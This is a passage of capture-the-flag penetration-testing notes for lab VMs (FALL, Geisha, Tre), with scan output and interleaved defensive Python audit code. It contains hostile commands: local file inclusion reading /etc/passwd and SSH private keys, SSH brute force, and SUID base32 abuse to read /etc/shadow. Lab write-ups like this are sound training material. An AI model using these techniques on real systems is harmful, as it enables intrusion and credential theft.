cpe:/o:linux:linux_kernel 55 | 56 | Host script results: 57 | |_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s 58 | | smb-os-discovery: 59 | | OS: Windows 6.1 (Samba 4.8.10) 60 | | Computer name: fall 61 | | NetBIOS computer name: FALL\x00 62 | | Domain name: \x00 63 | | FQDN: fall 64 | |_ System time: 2022-07-14T19:58:48-07:00 65 | | smb-security-mode: 66 | | account_used: 67 | | authentication_level: user 68 | | challenge_response: supported 69 | |_ message_signing: disabled (dangerous, but default) 70 | | smb2-security-mode: 71 | | 2.02: 72 | |_ Message signing enabled but not required 73 | | smb2-time: 74 | | date: 2022-07-15T02:58:46 75 | |_ start_date: N/A 76 | 77 | TRACEROUTE 78 | HOP RTT ADDRESS 79 | 1 0.21 ms 192.168.146.52 80 | 81 | OS and Service detection performed. 
Please report any incorrect results at https://nmap.org/submit/ . 82 | Nmap done: 1 IP address (1 host up) scanned in 174.40 seconds 83 | 84 | ``` 85 | ### DIRSEARCH 86 | ``` 87 | dirsearch -u https://192.168.146.52 88 | 89 | _|. _ _ _ _ _ _|_ v0.4.2 90 | (_||| _) (/_(_|| (_| ) 91 | 92 | Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 93 | 94 | Output File: /home/aacai/.dirsearch/reports/192.168.146.52/_22-07-15_11-10-57.txt 95 | 96 | Error Log: /home/aacai/.dirsearch/logs/errors-22-07-15_11-10-57.log 97 | 98 | Target: https://192.168.146.52/ 99 | 100 | [11:10:57] Starting: 101 | [11:10:58] 403 - 220B - /.fishsrv.pl 102 | [11:10:58] 403 - 220B - /.ht_wsr.txt 103 | [11:10:58] 403 - 223B - /.htaccess.bak1 104 | [11:10:58] 403 - 223B - /.htaccess.orig 105 | [11:10:58] 403 - 225B - /.htaccess.sample 106 | 107 | .... 108 | 复制到一个txt文件里面grep 200状态的路径出来 109 | 110 | └─$ cat 80_info.txt | grep "200" 111 | [11:11:03] 200 - 4KB - /admin/login.php 112 | [11:11:07] 200 - 2KB - /assets/ 113 | [11:11:09] 200 - 0B - /config.php 114 | [11:11:11] 200 - 24B - /doc/ 115 | [11:11:12] 200 - 80B - /error.html 116 | [11:11:12] 200 - 1KB - /favicon.ico 117 | [11:11:14] 200 - 8KB - /index.php 118 | [11:11:15] 200 - 24B - /lib/ 119 | [11:11:17] 200 - 3KB - /modules/ 120 | [11:11:19] 200 - 17B - /phpinfo.php 121 | [11:11:22] 200 - 79B - /robots.txt 122 | [11:11:26] 200 - 80B - /test.php 123 | [11:11:26] 200 - 1KB - /tmp/ 124 | [11:11:27] 200 - 0B - /uploads/ 125 | 126 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 127 | └─$ 128 | ``` 129 | ## Web枚举 130 | >拿到admin的后台目录 131 | 132 | ![Img](../FILES/FALL/img-20220715111910.png) 133 | >sql注入无果 134 | 135 | >assets里面的文件夹均没有文件 136 | 137 | ![Img](../FILES/FALL/img-20220715112000.png) 138 | 139 | >doc没有返回任何信息 140 | ![Img](../FILES/FALL/img-20220715112225.png) 141 | >只有注释带有一句DUMMY HTML File 142 | 143 | >phpinfo.php也同样没有返回信息 144 | robots.php返回File not Found 145 | 146 | >但是 147 | 访问test.php的时候 148 | 告诉我Missing GET 
parameter 149 | ![Img](../FILES/FALL/img-20220715112425.png) 150 | 那就试试ffuf 151 | 152 | >ffuf是一款web fuzzer的工具, 用起来就是一个字"快" 153 | 但是在kali当中没有默认安装 154 | 需要sudo apt install ffuf去安装 155 | 156 | ``` 157 | 在这个地方我使用的字典不是默认自带的, 需要下载 158 | 可以使用sudo apt install seclists 159 | 或者直接上github下载 160 | https://github.com/danielmiessler/SecLists 161 | 默认路径/usr/share/seclists 162 | 163 | ┌──(aacai㉿kali)-[/usr/share/wordlists/wfuzz] 164 | └─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u "https://192.168.146.52/test.php?FUZZ=/etc/passwd" -fs 80 1 ⨯ 165 | 166 | /'___\ /'___\ /'___\ 167 | /\ \__/ /\ \__/ __ __ /\ \__/ 168 | \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ 169 | \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ 170 | \ \_\ \ \_\ \ \____/ \ \_\ 171 | \/_/ \/_/ \/___/ \/_/ 172 | 173 | v1.5.0 Kali Exclusive <3 174 | ________________________________________________ 175 | 176 | :: Method : GET 177 | :: URL : https://192.168.146.52/test.php?FUZZ=/etc/passwd 178 | :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt 179 | :: Follow redirects : false 180 | :: Calibration : false 181 | :: Timeout : 10 182 | :: Threads : 40 183 | :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 184 | :: Filter : Response size: 80 185 | ________________________________________________ 186 | 187 | file [Status: 200, Size: 1633, Words: 36, Lines: 33, Duration: 11ms] 188 | :: Progress: [4712/4712] :: Job [1/1] :: 3126 req/sec :: Duration: [0:00:02] :: Errors: 0 :: 189 | 190 | ``` 191 | >在这里就可以看到file是作为一个get参数的, 那就代表它有文件包含 192 | ``` 193 | https://192.168.146.52/test.php?file=/etc/passwd 194 | ``` 195 | ![Img](../FILES/FALL/img-20220715115848.png) 196 | >curl到本地 197 | ``` 198 | http://192.168.146.52/test.php?file=/etc/passwd 199 | ``` 200 | >试试看/root的.ssh key 201 | ``` 202 | ┌──(aacai㉿kali)-[~/Desktop/192.168.146.52] 203 | └─$ curl http://192.168.146.52/test.php?file=/root/.ssh/id_rsa 204 | 205 | ``` 206 | >并没有回显, 从网页上获取一下信息 207 | ![Img](../FILES/FALL/img-20220715120726.png) 
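The `file` parameter above hands whatever path the client sends straight to the include, which is why `/etc/passwd` and a user's `id_rsa` come back. The hardened counterpart, as an added example in Python rather than the site's own PHP (not code from the original notes; the document root, file names and the constructed temp tree are assumptions), keeps the requested path inside a fixed directory both lexically and after resolving symlinks:

```python
import os
import tempfile
from pathlib import Path
from typing import Optional, Tuple

# Assumed document root for the example: the only directory a
# test.php-style handler should ever read from.
DOC_ROOT = "/var/www/html/docs"


def vulnerable_path(base_dir: str, requested: str) -> str:
    """The pattern behind test.php?file=: the client value is joined onto a
    base directory and read. join() drops base_dir entirely when the value is
    absolute, and '..' walks out of it otherwise, which is how /etc/passwd and
    /home/qiu/.ssh/id_rsa came back in the notes."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_within(base_dir: str, requested: str) -> Optional[str]:
    """Lexical check: normalised absolute path of `requested` inside base_dir,
    or None if it is empty, absolute, or climbs out of base_dir with '..'."""
    if not requested or requested.startswith(("/", "\\")):
        return None
    base = os.path.normpath(os.path.abspath(base_dir))
    candidate = os.path.normpath(os.path.join(base, requested))
    # commonpath() equals base only when candidate is at or below it; this
    # also rejects sibling-prefix tricks such as "../docs2/x".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def read_document(base_dir: str, requested: str) -> Optional[bytes]:
    """Physical check on top of the lexical one: realpath() follows symlinks,
    so a link docs/leak -> somewhere outside docs/ is refused as well."""
    candidate = resolve_within(base_dir, requested)
    if candidate is None:
        return None
    real_base = os.path.realpath(base_dir)
    real_target = os.path.realpath(candidate)
    if os.path.commonpath([real_base, real_target]) != real_base:
        return None
    if not os.path.isfile(real_target):
        return None
    with open(real_target, "rb") as fh:
        return fh.read()


def demo_symlink_escape() -> Tuple[Optional[bytes], Optional[bytes]]:
    """Constructed sample tree: docs/guide.html is a real file, docs/leak is a
    symlink to a file outside docs/. Returns what each request yields."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = Path(tmp, "docs")
        docs.mkdir()
        (docs / "guide.html").write_bytes(b"<h1>Fall Sales</h1>")
        secret = Path(tmp, "secret.txt")
        secret.write_bytes(b"outside the document root")
        os.symlink(secret, docs / "leak")
        return (read_document(str(docs), "guide.html"),
                read_document(str(docs), "leak"))


if __name__ == "__main__":
    print(vulnerable_path(DOC_ROOT, "/etc/passwd"))             # /etc/passwd
    print(vulnerable_path(DOC_ROOT, "../../../../etc/passwd"))  # /etc/passwd
    print(resolve_within(DOC_ROOT, "../../../../etc/passwd"))   # None
    print(resolve_within(DOC_ROOT, "sub/../guide.html"))        # /var/www/html/docs/guide.html
    print(demo_symlink_escape())                                # (b'<h1>Fall Sales</h1>', None)
```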
There is a "posted by qiu"; this user may be a way in
```
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ curl http://192.168.146.52/test.php?file=/home/qiu/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$
```
>Got qiu's SSH key
```
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ ls -al
total 36
drwxr-xr-x  2 aacai aacai 4096 Jul 15 12:11 .
drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 ..
-rw-r--r--  1 aacai aacai 3150 Jul 15 11:07 44567.txt
-rw-r--r--  1 aacai aacai 3446 Jul 15 11:13 49199.txt
-rw-r--r--  1 aacai aacai 1080 Jul 15 11:09 49345.txt
-rw-r--r--  1 aacai aacai 1070 Jul 15 11:03 49390.txt
-rw-r--r--  1 aacai aacai 3596 Jul 15 11:11 80_info.txt
-rw-r--r--  1 aacai aacai 1633 Jul 15 12:00 passwd.txt
-rw-r--r--  1 aacai aacai 1831 Jul 15 12:11 ssh_rsa

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ ssh -i ssh_rsa qiu@192.168.146.52
The authenticity of host '192.168.146.52 (192.168.146.52)' can't be established.
ECDSA key fingerprint is SHA256:+P4Rs5s4ipya3/t+GBoy0WjQqL/LaExt9MFvWgld4xc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.146.52' (ECDSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'ssh_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ssh_rsa": bad permissions
qiu@192.168.146.52: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

```
>The file permissions are wrong; fix them
```
└─$ sudo chmod 600 ssh_rsa
[sudo] password for aacai:

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ ls -al
total 36
drwxr-xr-x  2 aacai aacai 4096 Jul 15 12:11 .
drwxr-xr-x 13 aacai aacai 4096 Jul 15 10:55 ..
-rw-r--r--  1 aacai aacai 3150 Jul 15 11:07 44567.txt
-rw-r--r--  1 aacai aacai 3446 Jul 15 11:13 49199.txt
-rw-r--r--  1 aacai aacai 1080 Jul 15 11:09 49345.txt
-rw-r--r--  1 aacai aacai 1070 Jul 15 11:03 49390.txt
-rw-r--r--  1 aacai aacai 3596 Jul 15 11:11 80_info.txt
-rw-r--r--  1 aacai aacai 1633 Jul 15 12:00 passwd.txt
-rw-------  1 aacai aacai 1831 Jul 15 12:11 ssh_rsa

┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$
┌──(aacai㉿kali)-[~/Desktop/192.168.146.52]
└─$ ssh -i ssh_rsa qiu@192.168.146.52
Web console: https://FALL:9090/ or https://192.168.146.52:9090/

Last login: Sun Sep  5 19:28:51 2021
[qiu@FALL ~]$
Login successful
```
### Privilege escalation
```
[qiu@FALL ~]$ ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  local.txt  reminder  .ssh
[qiu@FALL ~]$ cat .bash_history
ls -al
cat .bash_history
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update
ifconfig
ping www.google.com
ps -aux
ps -ef | grep apache
env
env > env.txt
rm env.txt
lsof -i tcp:445
lsof -i tcp:80
ps -ef
lsof -p 1930
lsof -p 2160
rm .bash_history
exit
ls -al
cat .bash_history
exit
[qiu@FALL ~]$ id
uid=1000(qiu) gid=1000(qiu) groups=1000(qiu),10(wheel)
[qiu@FALL ~]$ sudo -l
[sudo] password for qiu:
Matching Defaults entries for qiu on FALL:
    !visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME
    LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User qiu may run the following commands on FALL:
    (ALL) ALL
[qiu@FALL ~]$

```
>...This privilege escalation is inexplicably easy: the password is sitting right there in .bash_history,
and sudo grants every permission
```
[qiu@FALL ~]$ sudo su
[root@FALL qiu]# id
uid=0(root) gid=0(root) groups=0(root)
[root@FALL qiu]# who ami
[root@FALL qiu]# whoami
root
[root@FALL qiu]# ip a
1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:43:01:8a brd ff:ff:ff:ff:ff:ff
    inet 192.168.146.52/24 brd 192.168.146.255 scope global dynamic noprefixroute ens33
       valid_lft 67037sec preferred_lft 67037sec
    inet6 fe80::af86:ce1d:cf2a:e830/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
[root@FALL qiu]# cd
[root@FALL ~]# ls
anaconda-ks.cfg  original-ks.cfg  proof.txt  remarks.txt
[root@FALL ~]# cat proof.txt
Congrats on a root shell! :-)
[root@FALL ~]#

```
-------------------------------------------------------------------------------- /Target Notes/Geisha.md: --------------------------------------------------------------------------------
# Geisha
## Information gathering
### Port enumeration
Full port scan
```
└─$ sudo nmap -p- 192.168.146.66
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 14:40 HKT
Nmap scan report for 192.168.146.66
Host is up (0.00029s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
7080/tcp open  empowerid
7125/tcp open  unknown
8088/tcp open  radan-http
9198/tcp open  unknown
MAC Address: 00:0C:29:D6:81:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.97 seconds

```
Enumeration of the specific ports
```
└─$ sudo nmap -p21,22,80,7080,7125,8088,9198 -sV -A 192.168.146.66
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 14:41 HKT
Nmap scan report for 192.168.146.66
Host is up (0.00034s latency).

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: Geisha
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open  ssl/http LiteSpeed httpd
|_http-title: Geisha
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after:  2022-05-09T14:01:34
|_http-server-header: LiteSpeed
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
7125/tcp open  http     nginx 1.17.10
|_http-title: Geisha
|_http-server-header: nginx/1.17.10
8088/tcp open  http     LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Geisha
9198/tcp open  http     SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-title: Geisha
MAC Address: 00:0C:29:D6:81:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.146.66

```
### FTP login attempt
Anonymous login on port 21 is not allowed

![Img](../FILES/Geisha/img-20220814144430.png)

### Web information gathering
Port 80 information gathering
```
...
[14:48:26] 200 -  176B - /index.html
[14:48:26] 200 -    2B - /info.php
...
```

![Img](../FILES/Geisha/img-20220814145223.png)

info.php contains just a 1 and nothing else


---
Port 7080
![Img](../FILES/Geisha/img-20220814145410.png)
Same picture as on port 80


```
└─$ cat 7080_result.txt | grep -v "403"
[14:54:24] Starting:
[14:54:39] 301 -    1KB - /docs  ->  https://192.168.146.66:7080/docs/
[14:54:39] 200 -    6KB - /docs/
[14:54:43] 200 -  176B  - /index.html

```

The docs directory shows the current server version
![Img](../FILES/Geisha/img-20220814145834.png)
nikto returned nothing

dirb returned the js and img directories
```
START_TIME: Sun Aug 14 15:11:58 2022
URL_BASE: https://192.168.146.66:7080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: https://192.168.146.66:7080/ ----
==> DIRECTORY: https://192.168.146.66:7080/docs/
+ https://192.168.146.66:7080/index.html (CODE:200|SIZE:176)

---- Entering directory: https://192.168.146.66:7080/docs/ ----
==> DIRECTORY: https://192.168.146.66:7080/docs/css/
==> DIRECTORY: https://192.168.146.66:7080/docs/img/
+ https://192.168.146.66:7080/docs/index.html (CODE:200|SIZE:5678)

---- Entering directory: https://192.168.146.66:7080/docs/css/ ----

---- Entering directory: https://192.168.146.66:7080/docs/img/ ----

-----------------
END_TIME: Sun Aug 14 15:12:05 2022
DOWNLOADED: 18448 - FOUND: 2

```
---
Port 7125
![Img](../FILES/Geisha/img-20220814151251.png)
The same picture

Directory enumeration
```
...
[15:13:32] 200 -  175B - /index.php
[15:13:33] 200 -  175B - /index.php/login/
[15:13:38] 200 -    1KB - /passwd
...
```
Found a login directory and a passwd module; visiting the passwd module directly downloads a passwd file
![Img](../FILES/Geisha/img-20220814151449.png)
But no password hashes were found in it, and only three users can log in

![Img](../FILES/Geisha/img-20220814151809.png)

![Img](../FILES/Geisha/img-20220814151604.png)
Visiting login returns an image, but with no content

---
Port 8088
```
Target: http://192.168.146.66:8088/

[15:20:01] Starting:
[15:20:14] 301 -    1KB - /cgi-bin  ->  http://192.168.146.66:8088/cgi-bin/
[15:20:17] 301 -    1KB - /docs  ->  http://192.168.146.66:8088/docs/
[15:20:17] 200 -    6KB - /docs/
[15:20:20] 200 -  176B  - /index.html
[15:20:20] 200 -    2B  - /info.php

```

Under cgi-bin there is only a helloword page
![Img](../FILES/Geisha/img-20220814152427.png)

---
Port 9198 information gathering
```
└─$ dirb "http://192.168.146.66:9198"

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Aug 14 15:29:58 2022
URL_BASE: http://192.168.146.66:9198/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.146.66:9198/ ----
+ http://192.168.146.66:9198/index.html (CODE:200|SIZE:176)
+ http://192.168.146.66:9198/info.php (CODE:200|SIZE:2)

-----------------
END_TIME: Sun Aug 14 15:30:04 2022
DOWNLOADED: 4612 - FOUND: 2


└─$ nikto -h "http://192.168.146.66:9198/"
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.66
+ Target Hostname:    192.168.146.66
+ Target Port:        9198
+ Start Time:         2022-08-14 15:27:11 (GMT8)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.16
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated:  19 error(s) and 4 item(s) reported on remote host
+ End Time:           2022-08-14 15:28:51 (GMT8) (100 seconds)
---------------------------------------------------------------------------


Target: http://192.168.146.66:9198/

[15:25:22] Starting:
[15:25:43] 200 -  176B - /index.html
[15:25:44] 200 -    2B - /info.php

```
Basically consistent with the previous scan results

Got the SSH password
## Breaking the perimeter
### SSH password brute force
In the end the web pages basically only gave us a passwd file, so the only way to break the perimeter is SSH brute force
![Img](../FILES/Geisha/img-20220814153904.png)
### Privilege escalation after obtaining the password
With the SSH password we can log straight into the target
![Img](../FILES/Geisha/img-20220814153958.png)

Check whether there are SUID files and whether we have any sudo rights

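The check above is the same one a defender should run on a baseline: the `sudo -l` rules that handed out root on Cute and FALL, and the stray SUID bit on Geisha's `base32`. As an added example that is not part of the original write-ups, this Python audit parses `sudo -l` output and a `find / -perm -u=s -type f` listing and flags both patterns; the shell-capable program list and the SUID baseline are assumed samples, and the embedded `sudo -l` text is the Cute output from these notes, copied in as a constructed sample.

```python
import re
from dataclasses import dataclass
from typing import Iterator, List, Set, Tuple

# Assumed sample of programs that yield a root shell or arbitrary file access
# when run with root privileges (hping3 and base32 are the two these notes
# hit); extend from your own policy, this list is not exhaustive.
SHELL_OR_FILE_CAPABLE: Set[str] = {
    "hping3", "base32", "base64", "vim", "vi", "less", "more", "find",
    "awk", "perl", "python", "python3", "bash", "sh", "nmap", "env",
}

# Assumed baseline of SUID files expected on the image; anything else is new.
SUID_BASELINE: Set[str] = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/openssh/ssh-keysign",
}

HEADER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# "(runas) TAG: TAG: command" as printed by sudo -l, e.g. "(root) NOPASSWD: /usr/sbin/hping3 --icmp"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


@dataclass
class Finding:
    subject: str    # sudo user, or SUID file path
    detail: str
    severity: str   # "critical" or "high"


def parse_sudo_l(text: str) -> Iterator[Tuple[str, str, bool, str]]:
    """Yield (user, runas, nopasswd, command) for each rule in `sudo -l` output.
    Only lines after the 'User X may run ...' header are rules; the
    'Matching Defaults entries' block above it is skipped."""
    user = None
    for line in text.splitlines():
        header = HEADER_RE.match(line)
        if header:
            user = header.group(1)
            continue
        rule = RULE_RE.match(line) if user else None
        if rule:
            tags = rule.group("tags").replace(":", " ").split()
            yield user, rule.group("runas"), "NOPASSWD" in tags, rule.group("cmd")


def audit_sudo(text: str) -> List[Finding]:
    """Flag rules that let the user become root: ALL as the command, or a
    shell/file-capable program, with or without a password prompt."""
    findings: List[Finding] = []
    for user, runas, nopasswd, cmd in parse_sudo_l(text):
        as_root = runas.split(":")[0].strip() in ("ALL", "root")
        if not as_root:
            continue
        pw = "without a password" if nopasswd else "with the user's own password"
        if cmd == "ALL":
            findings.append(Finding(user, f"may run any command as root {pw}", "critical"))
            continue
        program = cmd.split()[0].rsplit("/", 1)[-1]
        if program in SHELL_OR_FILE_CAPABLE:
            findings.append(Finding(
                user, f"{cmd!r} as root {pw}: {program} can spawn a shell or read files", "high"))
    return findings


def audit_suid(paths: List[str]) -> List[Finding]:
    """Diff a `find / -perm -u=s -type f` listing against the baseline."""
    findings: List[Finding] = []
    for path in sorted(set(paths) - SUID_BASELINE):
        name = path.rsplit("/", 1)[-1]
        if name in SHELL_OR_FILE_CAPABLE:
            findings.append(Finding(path, f"SUID bit not in baseline; {name} reads or writes files as root", "critical"))
        else:
            findings.append(Finding(path, "SUID bit not in baseline", "high"))
    return findings


# Constructed sample: the `sudo -l` result recorded on the Cute box above.
CUTE_SUDO_L = r"""Matching Defaults entries for www-data on cute:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on cute:
    (root) NOPASSWD: /usr/sbin/hping3 --icmp
    (ALL) NOPASSWD: ALL
"""

# Constructed sample: the baseline plus the extra /usr/bin/base32 seen on Geisha.
GEISHA_SUID = sorted(SUID_BASELINE) + ["/usr/bin/base32"]

if __name__ == "__main__":
    for f in audit_sudo(CUTE_SUDO_L) + audit_suid(GEISHA_SUID):
        print(f"[{f.severity}] {f.subject}: {f.detail}")
```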
![Img](../FILES/Geisha/img-20220814154114.png)

/usr/bin/base32 has the SUID bit set

Look up how base32 can be used for privilege escalation

![Img](../FILES/Geisha/img-20220814154256.png)
So we can read the /etc/shadow file through base32!
![Img](../FILES/Geisha/img-20220814154315.png)
Got root's password hash; try whether john can crack it

Likewise we can also try to get root's SSH key

![Img](../FILES/Geisha/img-20220814154442.png)
Got root's SSH key; once we have it we need to change the key's permissions, otherwise we cannot log in

![Img](../FILES/Geisha/img-20220814154639.png)
### Privilege escalation succeeded
After changing the permissions of id_rsa, logged in as root successfully

![Img](../FILES/Geisha/img-20220814154715.png)
![Img](../FILES/Geisha/img-20220814154741.png)

## Note
The command used in this write-up to find files with the SUID bit set is
```
find / -perm -u=s -type f 2>/dev/null
```
## Summary
On this box we broke the perimeter mainly by brute force and escalated via SUID. The many open ports slowed us down, so it pays to organise your approach: brute-forcing as soon as the passwd file is obtained reduces the workload and saves time

Finally, I wish every master an early pass on the certificate they are after
-------------------------------------------------------------------------------- /Target Notes/Tre.md: --------------------------------------------------------------------------------
# Tre
Difficulty: medium
## Information gathering
### Port enumeration
```
// all ports
┌──(aaron㉿aacai)-[~/Desktop/Tre]
└─$ sudo nmap -p- 192.168.146.77
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-01 12:58 HKT
Nmap scan report for 192.168.146.77
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8082/tcp open  blackice-alerts
MAC Address: 00:0C:29:91:D4:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

// specified ports
┌──(aaron㉿aacai)-[~/Desktop/Tre]
└─$ sudo nmap -p22,80,8082 -sV -A 192.168.146.77
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-01 12:58 HKT
Nmap scan report for 192.168.146.77
Host is up (0.00028s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Tre
|_http-server-header: Apache/2.4.38 (Debian)
8082/tcp open  http    nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
MAC Address: 00:0C:29:91:D4:A8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.146.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.72 seconds

┌──(aaron㉿aacai)-[~/Desktop/Tre]
└─$

```
### Web directory enumeration
- Port 80

Dirsearch
```
Target: http://192.168.146.77/
[13:04:20] 200 -    5KB - /adminer.php
[13:04:24] 301 -  314B  - /cms  ->  http://192.168.146.77/cms/
[13:04:24] 302 -    0B  - /cms/  ->  site/
[13:04:31] 200 -  164B  - /index.html
[13:04:33] 200 -   87KB - /info.php
[13:04:44] 403 -  279B  - /server-status/
[13:04:44] 403 -  279B  - /server-status
[13:04:46] 401 -  461B  - /system
[13:04:46] 401 -  461B  - /system/
[13:04:46] 401 -  461B  - /system/cache/
[13:04:46] 401 -  461B  - /system/cron/cron.txt
[13:04:46] 401 -  461B  - /system/expressionengine/config/config.php
[13:04:46] 401 -  461B  - /system/log/
[13:04:46] 401 -  461B  - /system/logs/
[13:04:46] 401 -  461B  - /system/storage/
[13:04:47] 401 -  461B  - /system/error.txt
[13:04:47] 401 -  461B  - /system/expressionengine/config/database.php

```
nikto
```
└─$ nikto -h http://192.168.146.77/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.146.77
+ Target Hostname:    192.168.146.77
+ Target Port:        80
